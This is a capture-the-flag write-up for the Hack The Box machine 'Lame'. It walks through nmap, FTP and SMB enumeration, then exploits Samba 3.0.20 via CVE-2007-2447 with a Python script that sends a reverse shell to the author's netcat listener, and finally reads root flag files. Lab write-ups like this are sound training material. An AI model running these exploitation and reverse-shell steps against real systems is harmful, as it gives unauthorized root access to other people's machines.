Discovery
NMAP
─[us-vip-4]─[10.10.14.8]─[htb-ghohst@pwnbox-base]─[~]
└──╼ [★]$ sudo nmap -sC -sV 10.10.10.3
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-23 20:25 BST
Nmap scan report for 10.10.10.3
Host is up (0.0054s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.8
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2022-06-23T15:25:54-04:00
|_clock-skew: mean: 2h00m23s, deviation: 2h49m44s, median: 21s
FTP
Connected to FTP Anonymously, doesn’t appear to be anything there (only directories were . and .. navigating around didn’t show anything promising)
─[us-vip-4]─[10.10.14.8]─[htb-ghohst@pwnbox-base]─[~]
└──╼ [★]$ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
SMB
SMBMap seems to find something interesting in tmp (‘oh noes!’ - probably because it’s anonymous read/write)
─[us-vip-4]─[10.10.14.8]─[htb-ghohst@pwnbox-base]─[~]
└──╼ [★]$ smbmap -H 10.10.10.3
[+] IP: 10.10.10.3:445 Name: 10.10.10.3
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
Recursive file search shows a few files inside of TMP:
─[us-vip-4]─[10.10.14.8]─[htb-ghohst@pwnbox-base]─[~]
└──╼ [★]$ smbmap -R -H 10.10.10.3
[+] IP: 10.10.10.3:445 Name: 10.10.10.3
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
.\tmp\*
dr--r--r-- 0 Thu Jun 23 20:55:02 2022 .
dw--w--w-- 0 Sat Oct 31 06:33:57 2020 ..
dr--r--r-- 0 Thu Jun 23 20:47:03 2022 .ICE-unix
dw--w--w-- 0 Thu Jun 23 20:47:31 2022 vmware-root
dr--r--r-- 0 Thu Jun 23 20:47:28 2022 .X11-unix
fw--w--w-- 11 Thu Jun 23 20:47:28 2022 .X0-lock
fw--w--w-- 0 Thu Jun 23 20:48:05 2022 5563.jsvc_up
fw--w--w-- 1600 Thu Jun 23 20:47:01 2022 vgauthsvclog.txt.0
.\tmp\.X11-unix\*
dr--r--r-- 0 Thu Jun 23 20:47:28 2022 .
dr--r--r-- 0 Thu Jun 23 20:55:02 2022 ..
fr--r--r-- 0 Thu Jun 23 20:47:28 2022 X0
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
This command will allow us to download files, vgauth stood out, but perhaps I’m not looking at the right thing as it is empty:
─[us-vip-4]─[10.10.14.8]─[htb-ghohst@pwnbox-base]─[~]
└──╼ [★]$ gedit 10.10.10.3-tmpvgauthsvclog.txt.0
Exploitation
SAMBA
We saw that the server itself is running 3.0.20 (Samba) so let’s read about any potential exploits.
Identified this link: ## CVE-2007-2447
The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the “username map script” smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.
Performed some searchsploit checks and found this as well Link
[us-vip-4]─[10.10.14.8]─[htb-ghohst@pwnbox-base]─[~]
└──╼ [★]$ searchsploit samba 3.0.20
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Securi | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map scr | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
---------------------------------------------- ---------------------------------
Shellcodes: No Results
─[us-vip-4]─[10.10.14.8]─[htb-ghohst@pwnbox-base]─[~]
└──╼ [★]$ searchsploit -p 16320
Exploit: Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)
URL: https://www.exploit-db.com/exploits/16320
Path: /usr/share/exploitdb/exploits/unix/remote/16320.rb
File Type: Ruby script, ASCII text
Copied EDB-ID #16320's path to the clipboard
─[us-vip-4]─[10.10.14.8]─[htb-ghohst@pwnbox-base]─[~]
└──╼ [★]$ searchsploit -w 16320
---------------------------------------------------------------------------- --------------------------------------------
Exploit Title | URL
---------------------------------------------------------------------------- --------------------------------------------
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasp | [Link](https://www.exploit-db.com/exploits/16320)
---------------------------------------------------------------------------- --------------------------------------------
Shellcodes: No Results
Looks like these are all metasploit, and we’re trying to avoid its usage for the exam. Found a github python script to do the manual exploitation: Link
This video explains how to walk through exploitation (both manual and via metasploit) Link
First attempt was a failure because I had not installed the PYSMB module in order to import the SMBConnection:
└──╼ [★]$ python -m pip install pysmb
Collecting pysmb
Downloading pysmb-1.2.8.zip (1.3 MB)
|████████████████████████████████| 1.3 MB 5.3 MB/s
---
Successfully built pysmb
Installing collected packages: pysmb
Successfully installed pysmb-1.2.8
Ran the script, with appropriate perameters, all while running a netcat listener in a separate terminal, and can see that the connection was established:
─[us-vip-4]─[10.10.14.8]─[htb-ghohst@pwnbox-base]─[~/CVE-2007-2447]
└──╼ [★]$ python3 usermap_script.py 10.10.10.3 445 10.10.14.8 5000
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !
─[us-vip-4]─[10.10.14.8]─[htb-ghohst@pwnbox-base]─[~/CVE-2007-2447]
└──╼ [★]$ nc -nvlp 5000
listening on [any] 5000 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.3] 34178
Privilege Escalation
- Identified linux version/type via uname (GNU)
- Identified current user (root)
- Ran a find search to locate ‘user.txt’ (which is typically our user flag)
- Cat’d out User.txt and pulled the flag
- Cd’d back out into the root user folder and saw root.txt
- Cat’d out root.txt and pulled the flag
whoami
root
uname -a
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
find /* -name user.txt
/home/makis/user.txt
cat /home/makis/user.txt
[redacted]
find /* -name root.txt
/root/root.txt
cat /root/root.txt
[redacted]